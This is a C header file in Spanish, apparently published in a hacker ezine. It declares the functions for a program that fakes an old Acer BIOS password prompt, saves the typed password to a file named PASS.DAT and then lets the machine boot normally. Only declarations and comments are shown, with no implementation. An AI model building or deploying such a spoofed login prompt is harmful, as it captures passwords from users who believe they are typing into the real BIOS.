#ifndef Craken_CMOSPASW
 #define Craken_CMOSPASW
/*
		CMOSPasW.H

	 Funciones para hacer un Fake del BIOS PassWord.
	 Implementacion: Zapper Zaku.

	 Versin:        1.0   Fecha: 22/03/1996
	 Versin:        2.0   Fecha: 05/11/2005
	 Versin:        2.1   Fecha: 22/11/2005
	 Ultima Versin: 3.0   Fecha: 29/11/2005

   Historia:

	 Ver 1.0.- Version inicial, release para uso privado :P
	 Ver 2.0.- Transformacion del code para reflejar la evolucion
						 en los metodos de la programacion estructurada....
						 Realease privada, pero preparada para liberarse.
	 Ver 2.1.- Release Privada, pero se aadido, un soporte inicial
						 para su trabajo dentro de windows.
	 Ver 3.0.- Primera release publica, publicada en la ezine numero 2
						 del RTM Team.
*/
/*
	 Notas de este archivo:
	 - La version 1.0 inicio como un proyecto personal ... mientras estaba en
		 coordinacion de sistemas del Tec de Morelia, me quitaron el acceso a
		 una computadora marca Acer 386, le cambiaron la contrasea al BIOS, asi
		 que me di a la tarea de crear un simulador (ahora les llaman Fake), de
		 la peticion de la contrasea del BIOS de dicha maquina.... no solo logre
		 hacer el simulador, sino que ademas descubri como arrancar la maquina
		 normalmente, claro, en aquel entonces era bajo DOS, pero... lo probe bajo
		 Windows 98 y aun funciona como debe de ser. Es decir, pide la contrasea
		 y luego arranca la maquina de forma normal... (^_^)

*/


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Definiciones.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
/*
	 Nombre del archivo que contendra la cadena del PassWord, el cual
	 estara en el raiz del directorio donde se ejecute el programa
*/
#define FIL "\\PASS.DAT"


/*
	Los siguientes defines, son especificos para el BIOS Acer antiguo.
	Deberan ser cambiados para los BIOS modernos, deacuerdo a sus propias
	reglas.....
*/
#define ACER_ARTERISC_CHAR   ''
#define ACER_PEDIR_PASSWORD  "oķ "
#define ACER_MAX_CARS        6

/*

*/
#define OS_DOS    0
#define OS_WIN_9X 1
#define OS_WIN_NT 2


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de TypeDefs.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
typedef struct IREGS IREGS;

/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Estructuras.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
/* Los registros para las funciones de interrupcion */
struct IREGS
{
	int bp, di, si, ds, es, dx, cx, bx, ax, ip, cs, fl;
};

/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Macros
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
#define beep putchar(7)


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Prototipos.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/

/*+++++++++++++++++++++++ Funciones Internas +++++++++++++++++++++++*/
static void interrupt CMOSPasW_NewBreak (void);
static void interrupt CMOSPasW_NewCrit  (IREGS ir);

/*+++++++++++++++++++++++ Funciones Publicas +++++++++++++++++++++++*/
void CMOSPasW_Init         (void);
void CMOSPasW_MExit        (int Flager);
void CMOSPasW_ProcesoAcer  (char *Pass);

#endif
